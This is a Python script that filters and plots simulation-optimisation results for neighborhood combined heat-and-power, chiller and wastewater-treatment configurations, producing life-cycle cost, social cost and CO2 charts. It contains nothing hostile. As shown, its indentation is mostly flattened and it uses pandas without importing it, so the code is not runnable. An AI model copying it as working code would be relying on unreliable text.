import numpy as np
from matplotlib import pyplot as plt
def DF_Filter(filename):
file = np.loadtxt(filename, dtype='float')
inputDF = pd.DataFrame(file)
error_tol = 1.15
# print('GFA stats:')
# print(inputDF.iloc[:,38].describe())
print('+++++ processing %s +++++\n'%(filename))
print('Count duplicates:')
condition1 = inputDF.duplicated()==True
print(inputDF[condition1][38].count())
print('Count under the min GFA:') # Count non-trivial neighborhoods
    condition2 = inputDF[38] <= 1/error_tol  # <= 647497/10
print(inputDF[condition2][38].count())
print('Count over the max GFA:')
condition3 = inputDF[38]>=647497*5*error_tol
print(inputDF[condition3][38].count())
print('Count over the max Site GFA:')
condition4 = inputDF[38]/inputDF[36]>=647497*error_tol
print(inputDF[condition4][38].count())
print('Count valid answers:')
print(len(inputDF) - inputDF[condition1 | condition2 | condition3 | condition4][38].count())
# print('------------------')
# Filtering the inadmissible results
Filtered = ~(condition1 | condition2 | condition3 | condition4)
inputDF = inputDF[Filtered]
inputDF.reset_index(inplace=True, drop=True)
# print('Annual energy demand stats (MWh):')
inputDF[26] /= inputDF[38] # Normalizing LCC ($/m2)
inputDF[27] /= inputDF[38] # Normalizing SCC ($/m2)
inputDF[39] /= inputDF[38] # Normalizing CO2 (Tonnes/m2)
inputDF[40] /= (10**3*inputDF[38]) # Normalizing total energy demand (MWh/m2)
    inputDF[41] /= inputDF[38] # Normalizing total wastewater treatment demand (L/m2)
for i in range(29,36): # Converting percent areas to integer %
inputDF[i] = inputDF[i] * 100
# print(inputDF[40].describe())
return inputDF
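# Hedged note on the column indices used throughout this script (inferred from
# the inline comments): 21 = CHP type, 22 = chiller type, 24 = WWT type,
# 26 = LCC, 27 = SCC, 29-35 = building-mix percentages, 38 = GFA,
# 39 = lifecycle CO2, 40 = total energy demand, 41 = wastewater treatment demand.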
### MAIN FUNCTION
print('loading data')
filenames = ['../RQ1_W_CWWTP_ModConsts_Feb17/SDO_LHS_TestRuns288_Constraint_SF_Test.txt',
'../RQ1_WO_CWWTP_ModConsts_Feb17/SDO_LHS_TestRuns288_Constraint_SF_Test.txt']
DFNames = ['CCHP|CWWTP','CCHP+WWT']
DFs = {}
for i in range(2):
DFs[DFNames[i]] = DF_Filter(filenames[i])
plt.style.use('ggplot')
colors_rb = {DFNames[0]:'r', DFNames[1]:'b'}
# =============================================================================
## CHP/Chiller/Solar Types used in the individual neighborhood
CHP_Types = {}
CHP_Types[1] = 'Gas_1'
CHP_Types[2] = 'Gas_2'
CHP_Types[3] = 'Gas_3'
CHP_Types[4] = 'Gas_4'
CHP_Types[5] = 'Gas_5'
CHP_Types[6] = 'Micro_1'
CHP_Types[7] = 'Micro_2'
CHP_Types[8] = 'Micro_3'
CHP_Types[9] = 'Recipro_1'
CHP_Types[10] = 'Recipro_2'
CHP_Types[11] = 'Recipro_3'
CHP_Types[12] = 'Recipro_4'
CHP_Types[13] = 'Recipro_5'
CHP_Types[14] = 'Steam_1'
CHP_Types[15] = 'Steam_2'
CHP_Types[16] = 'Steam_3'
CHP_Types[17] = 'Fuel_Cell_1'
CHP_Types[18] = 'Fuel_Cell_2'
CHP_Types[19] = 'Fuel_Cell_3'
CHP_Types[20] = 'Fuel_Cell_4'
CHP_Types[21] = 'Fuel_Cell_5'
CHP_Types[22] = 'Fuel_Cell_6'
CHP_Types[23] = 'Bio_1'
CHP_Types[24] = 'Bio_2'
CHP_Types[25] = 'Bio_3'
CHP_Types[26] = 'Bio_4'
CHP_Types[27] = 'Bio_5'
CHP_Types[28] = 'Bio_6'
CHP_Types[29] = 'Bio_7'
CHP_Types[30] = 'Bio_8'
CHP_Types[31] = 'Bio_9'
CHP_Types[32] = 'Bio_10'
Chiller_Types = {}
Chiller_Types[1] = 'Electric_1'
Chiller_Types[2] = 'Electric_2'
Chiller_Types[3] = 'Electric_3'
Chiller_Types[4] = 'Electric_4'
Chiller_Types[5] = 'Electric_5'
Chiller_Types[6] = 'Electric_6'
Chiller_Types[7] = 'Electric_7'
Chiller_Types[8] = 'Electric_8'
Chiller_Types[9] = 'Electric_9'
Chiller_Types[10] = 'Absorp_1'
Chiller_Types[11] = 'Absorp_2'
Chiller_Types[12] = 'Absorp_3'
Chiller_Types[13] = 'Absorp_4'
Chiller_Types[14] = 'Absorp_5'
Chiller_Types[15] = 'Absorp_6'
Chiller_Types[16] = 'Absorp_7'
Chiller_Types[17] = 'Absorp_8'
WWT_Types = {}
WWT_Types[1] = "FO_MD"
WWT_Types[2] = "FO_RO"
WWT_Types[3] = "CWWTP"
## CHP, Chiller and WWT name assignments
# CHP = {}
# Chiller = {}
# WWT = {}
for DFName in DFNames:
# CHP[DFName] = np.array([CHP_Types[int(i)] for i in DFs[DFName][21]]) # Making strings of CHP names instead of integers
DFs[DFName][21] = np.array([CHP_Types[int(i)] for i in DFs[DFName][21]]) # Making strings of CHP names instead of integers
# Chiller[DFName] = np.array([Chiller_Types[int(i)] for i in DFs[DFName][22]]) # Making strings of Chiller names instead of integers
DFs[DFName][22] = np.array([Chiller_Types[int(i)] for i in DFs[DFName][22]]) # Making strings of Chiller names instead of integers
# WWT[DFName] = np.array([WWT_Types[int(i)] for i in DFs[DFName][24]]) # Making strings of WWT module names instead of integers
DFs[DFName][24] = np.array([WWT_Types[int(i)] for i in DFs[DFName][24]]) # Making strings of WWT module names instead of integers
# =============================================================================
######################## PLOTS ##########################
#############################################
print('plotting overall LCC and SCC graphs')
# LCC
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=26, ascending=True).reset_index(drop=True)
plt.scatter(x=sortedDF.index,y=(sortedDF[26]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel('Rank')
plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('LCC_Ascending.png', dpi=400, bbox_inches='tight')
# SCC
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=27, ascending=True).reset_index(drop=True)
plt.scatter(x=sortedDF.index,y=(sortedDF[27]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel('Rank')
plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.title('SCC')
plt.legend()
plt.savefig('SCC_Ascending.png', dpi=400, bbox_inches='tight')
plt.close('all')
#############################################
print('plotting LCC and SCC box plots')
print('\n#############################################')
print('Stats of LCC ($/m2) for Disintegrated Case:\n',(DFs[DFNames[0]][26]).describe())
print('Stats of LCC ($/m2) for Integrated Case:\n',(DFs[DFNames[1]][26]).describe())
print('Stats of SCC ($/m2) for Disintegrated Case:\n',(DFs[DFNames[0]][27]).describe())
print('Stats of SCC ($/m2) for Integrated Case:\n',(DFs[DFNames[1]][27]).describe())
print('#############################################\n')
# =============================================================================
# # LCC
# plt.figure(figsize=(10,5))
# # for DFName in DFNames:
# plt.boxplot(x=[(DFs[DFNames[0]][26]/10**3), (DFs[DFNames[1]][26]/10**3)])
# # (DFs[DFName][0][26]/10**6).plot(label=DFName)
# # plt.xlabel('Rank')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.xticks([1,2],[DFNames[0],DFNames[1]])
# # plt.title('LCC')
# plt.savefig('LCC_Boxplot.png', dpi=400, bbox_inches='tight')
#
#
#
# # SCC
# plt.figure(figsize=(10,5))
# # for DFName in DFNames:
# plt.boxplot(x=[(DFs[DFNames[0]][27]/10**3), (DFs[DFNames[1]][27]/10**3)])
# # (DFs[DFName][0][26]/10**6).plot(label=DFName)
# # plt.xlabel('Rank')
# plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.xticks([1,2],[DFNames[0],DFNames[1]])
# # plt.title('LCC')
# plt.savefig('SCC_Boxplot.png', dpi=400, bbox_inches='tight')
#
# plt.close('all')
# =============================================================================
'''
#############################################
print('plotting LCC/SCC vs total neighborhood energy and ww graphs')
print('\n#############################################')
print('Stats of Total Energy Demand (MWh/m2) for Disintegrated Case:\n',(DFs[DFNames[0]][40]).describe())
print('Stats of Total Energy Demand (MWh/m2) for Integrated Case:\n',(DFs[DFNames[1]][40]).describe())
print('Stats of Total Wastewater Treatment Demand (m3/m2) for Disintegrated Case:\n',(DFs[DFNames[0]][41]/10**3).describe())
print('Stats of Total Wastewater Treatment Demand (m3/m2) for Integrated Case:\n',(DFs[DFNames[1]][41]/10**3).describe())
print('#############################################\n')
# LCC vs Neighborhood's Total Energy Use
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=(sortedDF[40]),y=(sortedDF[26]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Energy Demand (MWh/$m^2$)')
plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('LCC_vs_Energy_Demand.png', dpi=400, bbox_inches='tight')
# LCC vs Neighborhood's Total WWater Demand
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=(sortedDF[41]/10**3),y=(sortedDF[26]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('LCC_vs_WWater_Demand.png', dpi=400, bbox_inches='tight')
# SCC vs Neighborhood's Total Energy Use
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=(sortedDF[40]),y=(sortedDF[27]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Energy Demand (MWh/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('SCC_vs_Energy_Demand.png', dpi=400, bbox_inches='tight')
# SCC vs Neighborhood's Total WWater Demand
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=(sortedDF[41]/10**3),y=(sortedDF[27]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.title('LCC')
plt.legend()
plt.savefig('SCC_vs_WWater_Demand.png', dpi=400, bbox_inches='tight')
plt.close('all')
#############################################
print('plotting building mix vs neighborhood energy and ww graphs')
# Building Mix vs Neighborhood's Total WWater Demand (integrated)
DFName = 'CCHP+WWT'
bldg_types = ['Res','Off','Com','Ind','Hos','Med','Edu']
colors = ['m','b','c','g','y','orange','r']
columns = list(range(29,36))
plt.figure(figsize=(10,5))
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
for i in range(len(bldg_types)):
plt.scatter(x=(sortedDF[41]/10**3),y=DFs[DFName].iloc[:,columns[i]],
s=0.5, label=bldg_types[i], c=colors[i], alpha=0.5)
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.ylabel('Percent of Total GFA (%)')
plt.ylim(0, 100)
plt.xlim(0,11)
# plt.title('LCC')
plt.legend()
plt.savefig('Bldg_Mix_vs_WWater_Demand_Integ.png', dpi=400, bbox_inches='tight')
# Building Mix vs Neighborhood's Total WWater Demand (Disintegrated)
DFName = 'CCHP|CWWTP'
bldg_types = ['Res','Off','Com','Ind','Hos','Med','Edu']
colors = ['m','b','c','g','y','orange','r']
columns = list(range(29,36))
plt.figure(figsize=(10,5))
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
for i in range(len(bldg_types)):
plt.scatter(x=(sortedDF[41]/10**3),y=DFs[DFName].iloc[:,columns[i]],
s=0.5, label=bldg_types[i], c=colors[i], alpha=0.5)
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.ylabel('Percent of Total GFA (%)')
# plt.title('LCC')
plt.ylim(0, 100)
plt.xlim(0,11)
plt.legend()
plt.savefig('Bldg_Mix_vs_WWater_Demand_Disinteg.png', dpi=400, bbox_inches='tight')
# Building Mix vs Neighborhood's Total Energy Demand (integrated)
DFName = 'CCHP+WWT'
bldg_types = ['Res','Off','Com','Ind','Hos','Med','Edu']
colors = ['m','b','c','g','y','orange','r']
columns = list(range(29,36))
plt.figure(figsize=(10,5))
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
for i in range(len(bldg_types)):
plt.scatter(x=(sortedDF[40]),y=DFs[DFName].iloc[:,columns[i]],
s=0.5, label=bldg_types[i], c=colors[i], alpha=0.5)
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Energy Demand (MWh/$m^2$)')
plt.ylabel('Percent of Total GFA (%)')
# plt.title('LCC')
plt.ylim(0, 100)
plt.xlim(0,1)
plt.legend()
plt.savefig('Bldg_Mix_vs_Energy_Demand_Integ.png', dpi=400, bbox_inches='tight')
# Building Mix vs Neighborhood's Total Energy Demand (Disintegrated)
DFName = 'CCHP|CWWTP'
bldg_types = ['Res','Off','Com','Ind','Hos','Med','Edu']
colors = ['m','b','c','g','y','orange','r']
columns = list(range(29,36))
plt.figure(figsize=(10,5))
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
for i in range(len(bldg_types)):
plt.scatter(x=(sortedDF[40]),y=DFs[DFName].iloc[:,columns[i]],
s=0.5, label=bldg_types[i], c=colors[i], alpha=0.5)
# (DFs[DFName][0][26]/10**6).plot(label=DFName)
plt.xlabel(r'Total Energy Demand (MWh/$m^2$)')
plt.ylabel('Percent of Total GFA (%)')
# plt.title('LCC')
plt.ylim(0, 100)
plt.xlim(0,1)
plt.legend()
plt.savefig('Bldg_Mix_vs_Energy_Demand_Disinteg.png', dpi=400, bbox_inches='tight')
plt.close('all')
#############################################
print('plotting Supply type vs total neighborhood energy and ww graphs')
# Total Energy Demand vs CHP
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][21],y=(sortedDF[40]),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'CHP Type')
plt.ylabel(r'Total Energy Demand (MWh/$m^2$)')
plt.legend()
plt.savefig('Total_Energy_vs_CHP.png', dpi=400, bbox_inches='tight')
# Total WWater Demand vs CHP
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][21],y=(sortedDF[41]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'CHP Type')
plt.ylabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.legend()
plt.savefig('Total_WWater_vs_CHP.png', dpi=400, bbox_inches='tight')
# Total Energy Demand vs Chiller
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][22],y=(sortedDF[40]),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'Chiller Type')
plt.ylabel(r'Total Energy Demand (MWh/$m^2$)')
plt.legend()
plt.savefig('Total_Energy_vs_Chiller.png', dpi=400, bbox_inches='tight')
# Total WWater Demand vs Chiller
plt.figure(figsize=(10,5))
for DFName in DFNames:
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=DFs[DFName][22],y=(sortedDF[41]/10**3),label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'Chiller Type')
plt.ylabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.legend()
plt.savefig('Total_WWater_vs_Chiller.png', dpi=400, bbox_inches='tight')
# Total Energy Demand vs WWT (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
sortedDF = DFs[DFName].sort_values(by=40, ascending=True).reset_index(drop=True)
plt.scatter(x=sortedDF[24],y=(sortedDF[40]),s=2, c=colors_rb[DFName])
plt.xlabel(r'WWT Type')
plt.ylabel(r'Total Energy Demand (MWh/$m^2$)')
plt.legend()
plt.savefig('Total_Energy_vs_WWT_Integ.png', dpi=400, bbox_inches='tight')
# Total WWater Demand vs WWT (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
sortedDF = DFs[DFName].sort_values(by=41, ascending=True).reset_index(drop=True)
plt.scatter(x=sortedDF[24],y=(sortedDF[41]/10**3), s=2, c=colors_rb[DFName])
plt.xlabel(r'WWT Type')
plt.ylabel(r'Total Wastewater Treatment Demand ($m^3$/$m^2$)')
plt.savefig('Total_Wwater_vs_WWT_Integ.png', dpi=400, bbox_inches='tight')
'''
plt.close('all')
#############################################
print('plotting pareto fronts')
# LCC vs CO2
plt.figure(figsize=(10,5))
for DFName in DFNames:
plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][39],label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'LCC (k\$/$m^2$)')
plt.ylabel(r'Lifecycle $CO_{2e}$ (T/$m^2$)')
plt.legend()
plt.savefig('CO2_vs_LCC.png', dpi=400, bbox_inches='tight')
#############################################
# LCC vs SCC
plt.figure(figsize=(10,5))
for DFName in DFNames:
plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][27]/10**3,label=DFName, s=2, alpha=0.5, c=colors_rb[DFName])
plt.xlabel(r'LCC (k\$/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.legend()
plt.savefig('SCC_vs_LCC.png', dpi=400, bbox_inches='tight')
# LCC vs SCC w Generation-based transparency
plt.figure(figsize=(10,5))
for DFName in DFNames:
alphas = np.linspace(0.1, 1, len(DFs[DFName]))
rgba_colors = np.zeros((len(DFs[DFName]),4))
if DFName == DFNames[0]:
rgba_colors[:,0] = 1.0 # red
else:
rgba_colors[:,2] = 1.0 # blue
rgba_colors[:,3] = alphas
plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][27]/10**3,label=DFName, s=1, c=rgba_colors)
plt.xlabel(r'LCC (k\$/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.legend()
plt.savefig('SCC_vs_LCC_Gen_Colorcoded.png', dpi=400, bbox_inches='tight')
# LCC vs SCC w Generation-based transparency and elite-filtered
plt.figure(figsize=(10,5))
for DFName in DFNames:
DF = DFs[DFName][DFs[DFName][26]/10**3 <= 500]
    DF = DF[DF[27]/10**3 <= 0.1]
alphas = np.linspace(0.1, 1, len(DF))
rgba_colors = np.zeros((len(DF),4))
if DFName == DFNames[0]:
rgba_colors[:,0] = 1.0 # red
else:
rgba_colors[:,2] = 1.0 # blue
rgba_colors[:,3] = alphas
plt.scatter(x=DF[26]/10**3,y=DF[27]/10**3,label=DFName, s=1, c=rgba_colors)
plt.xlabel(r'LCC (k\$/$m^2$)')
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.legend()
plt.savefig('SCC_vs_LCC_Gen_Colorcoded_Filtered.png', dpi=400, bbox_inches='tight')
# =============================================================================
# # LCC vs SCC (integrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP+WWT'
# plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][27]/10**3, s=2)
# plt.xlabel(r'LCC (k\$/$m^2$)')
# plt.ylabel(r'SCC (k\$/$m^2$)')
# plt.savefig('SCC_vs_LCC_Integ.png', dpi=400, bbox_inches='tight')
#
#
# # LCC vs SCC (disintegrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP|CWWTP'
# plt.scatter(x=DFs[DFName][26]/10**3,y=DFs[DFName][27]/10**3, s=2)
# # (DFs[DFName][0][26]/10**6).plot(label=DFName)
# plt.xlabel(r'LCC (k\$/$m^2$)')
# plt.ylabel(r'SCC (k\$/$m^2$)')
# # plt.title('LCC')
# plt.savefig('SCC_vs_LCC_Disinteg.png', dpi=400, bbox_inches='tight')
#
# =============================================================================
#############################################
print('plotting Supply type vs opt objectives')
print('\n#############################################')
Disinteg_Grpd_by_CHP_meanLCC = DFs[DFNames[0]].groupby(21)[26].mean()
Disinteg_Grpd_by_CHP_medLCC = DFs[DFNames[0]].groupby(21)[26].median()
Disinteg_Grpd_by_CHP_meanSCC = DFs[DFNames[0]].groupby(21)[27].mean()
Disinteg_Grpd_by_CHP_medSCC = DFs[DFNames[0]].groupby(21)[27].median()
Integ_Grpd_by_CHP_meanLCC = DFs[DFNames[1]].groupby(21)[26].mean()
Integ_Grpd_by_CHP_medLCC = DFs[DFNames[1]].groupby(21)[26].median()
Integ_Grpd_by_CHP_meanSCC = DFs[DFNames[1]].groupby(21)[27].mean()
Integ_Grpd_by_CHP_medSCC = DFs[DFNames[1]].groupby(21)[27].median()
items = [Disinteg_Grpd_by_CHP_meanLCC, Disinteg_Grpd_by_CHP_medLCC, Disinteg_Grpd_by_CHP_meanSCC,
         Disinteg_Grpd_by_CHP_medSCC, Integ_Grpd_by_CHP_meanLCC, Integ_Grpd_by_CHP_medLCC,
         Integ_Grpd_by_CHP_meanSCC, Integ_Grpd_by_CHP_medSCC]
items_names = ['Disinteg_Grpd_by_CHP_meanLCC', 'Disinteg_Grpd_by_CHP_medLCC', 'Disinteg_Grpd_by_CHP_meanSCC',
               'Disinteg_Grpd_by_CHP_medSCC', 'Integ_Grpd_by_CHP_meanLCC', 'Integ_Grpd_by_CHP_medLCC',
               'Integ_Grpd_by_CHP_meanSCC', 'Integ_Grpd_by_CHP_medSCC']
for i in range(len(items)):
print(items_names[i], items[i])
print('#############################################\n')
# shapes = {DFNames[0]: '+', DFNames[1]: 'x'}
# LCC vs CHP
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=21)
plt.scatter(x=DF[21], y=DF[26]/10**3,label=DFName, s=2, alpha=0.5)#, c=colors_rb[DFName])#, marker=shapes[DFName])
plt.xlabel(r'CHP Type')
plt.xticks(rotation=75)
plt.ylabel(r'LCC (k\$/$m^2$)')
plt.ylim(-5, 500)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('LCC_vs_CHP_disinteg.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('LCC_vs_CHP_integ.png', dpi=400, bbox_inches='tight')
# SCC vs CHP
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=21)
plt.scatter(x=DF[21], y=DF[27]/10**3,label=DFName, s=2, alpha=0.5)#, c=colors_rb[DFName])
plt.xlabel(r'CHP Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('SCC_vs_CHP_disinteg.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('SCC_vs_CHP_integ.png', dpi=400, bbox_inches='tight')
# SCC vs CHP with LCC-oriented transparency
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=21)
DF = DF[(DF[26]<=100) & (DF[27]<=100)]
print('number of indivs plotted: ', len(DF))
    alphas = np.clip(1.2 - DF[26]/DF[26].max(), 0.0, 1.0)  # lower LCC -> higher alpha, clipped to the valid [0, 1] range
# alphas = np.linspace(0.1, 1, len(DFs[DFName]))
rgba_colors = np.zeros((len(DF),4))
rgba_colors[:,3] = alphas
plt.scatter(x=DF[21],y=DF[27]/10**3,label=DFName, s=1, c=rgba_colors)
plt.xlabel(r'CHP Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('SCC_vs_CHP_disinteg_colorCoded.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('SCC_vs_CHP_integ_colorCoded.png', dpi=400, bbox_inches='tight')
# =============================================================================
# # LCC vs CHP (integrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP+WWT'
# plt.scatter(x=DFs[DFName][21], y=DFs[DFName][26]/10**3, s=2)
# plt.xlabel(r'CHP Type')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.savefig('LCC_vs_CHP_Integ.png', dpi=400, bbox_inches='tight')
#
#
# # LCC vs CHP (disintegrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP|CWWTP'
# plt.scatter(x=DFs[DFName][21], y=DFs[DFName][26]/10**3, s=2)
# plt.xlabel(r'CHP Type')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.savefig('LCC_vs_CHP_Disinteg.png', dpi=400, bbox_inches='tight')
# =============================================================================
# LCC vs Chiller
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=22)
plt.scatter(x=DF[22], y=DF[26]/10**3,label=DFName, s=2, alpha=0.5)#, c=colors_rb[DFName])
plt.xlabel(r'Chiller Type')
plt.xticks(rotation=75)
plt.ylabel(r'LCC (k\$/$m^2$)')
plt.ylim(-5, 500)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('LCC_vs_Chiller_disinteg.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('LCC_vs_Chiller_integ.png', dpi=400, bbox_inches='tight')
# SCC vs Chiller
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=22)
plt.scatter(x=DF[22], y=DF[27]/10**3,label=DFName, s=2, alpha=0.5)#, c=colors_rb[DFName])
plt.xlabel(r'Chiller Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('SCC_vs_Chiller_disinteg.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('SCC_vs_Chiller_integ.png', dpi=400, bbox_inches='tight')
# SCC vs Chiller with LCC-oriented transparency
for DFName in DFNames:
plt.figure(figsize=(10,5))
DF = DFs[DFName].sort_values(by=22)
DF = DF[(DF[26]<=100) & (DF[27]<=0.5)]
print('number of indivs plotted: ', len(DF))
alphas = 1 - DF[26]/DF[26].max() # Normalized LCCs (lowest LCC: 1; highest LCC: 0)
# alphas = np.linspace(0.1, 1, len(DFs[DFName]))
rgba_colors = np.zeros((len(DF),4))
rgba_colors[:,3] = alphas
plt.scatter(x=DF[22],y=DF[27]/10**3,label=DFName, s=1, c=rgba_colors)
plt.xlabel(r'Chiller Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
# plt.legend()
if DFName == 'CCHP|CWWTP':
plt.savefig('SCC_vs_Chiller_disinteg_colorCoded.png', dpi=400, bbox_inches='tight')
else:
plt.savefig('SCC_vs_Chiller_integ_colorCoded.png', dpi=400, bbox_inches='tight')
# =============================================================================
# # LCC vs Chiller (integrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP+WWT'
# plt.scatter(x=DFs[DFName][22], y=DFs[DFName][26]/10**3, s=2)
# plt.xlabel(r'Chiller Type')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.savefig('LCC_vs_Chiller_Integ.png', dpi=400, bbox_inches='tight')
#
#
# # LCC vs Chiller (disintegrated)
# plt.figure(figsize=(10,5))
# DFName = 'CCHP|CWWTP'
# plt.scatter(x=DFs[DFName][22], y=DFs[DFName][26]/10**3, s=2)
# plt.xlabel(r'Chiller Type')
# plt.ylabel(r'LCC (k\$/$m^2$)')
# plt.savefig('LCC_vs_Chiller_Disinteg.png', dpi=400, bbox_inches='tight')
# =============================================================================
# LCC vs WWT (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
DF = DFs[DFName].sort_values(by=24)
plt.scatter(x=DF[24], y=DF[26]/10**3, s=2)#, c=colors_rb[DFName])
plt.xlabel(r'WWT Type')
plt.xticks(rotation=75)
plt.ylabel(r'LCC (k\$/$m^2$)')
plt.ylim(-5, 500)
plt.savefig('LCC_vs_WWT_Integ.png', dpi=400, bbox_inches='tight')
# SCC vs WWT (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
DF = DFs[DFName].sort_values(by=24)
plt.scatter(x=DF[24], y=DF[27]/10**3, s=2)#, c=colors_rb[DFName])
plt.xlabel(r'WWT Type')
plt.xticks(rotation=75)
plt.ylabel(r'SCC (k\$/$m^2$)')
plt.ylim(-0.01, 0.1)
plt.savefig('SCC_vs_WWT_Integ.png', dpi=400, bbox_inches='tight')
# SCC vs WWT with LCC-oriented transparency (integrated)
plt.figure(figsize=(10,5))
DFName = 'CCHP+WWT'
DF = DFs[DFName].sort_values(by=24)
DF = DF[(DF[26]<=100) & (DF[27]<=0.5)]
print('number of indivs plotted: ', len(DF))
alphas = 1 - DF[26]/DF[26].max() # Normalized LCCs (lowest LCC: 1; highest LCC: 0)
# alphas = np.linspace(0.1, 1, len(DFs[DFName]))
rgba_colors = np.zeros((len(DF),4))
rgba_colors[:,3] = alphas
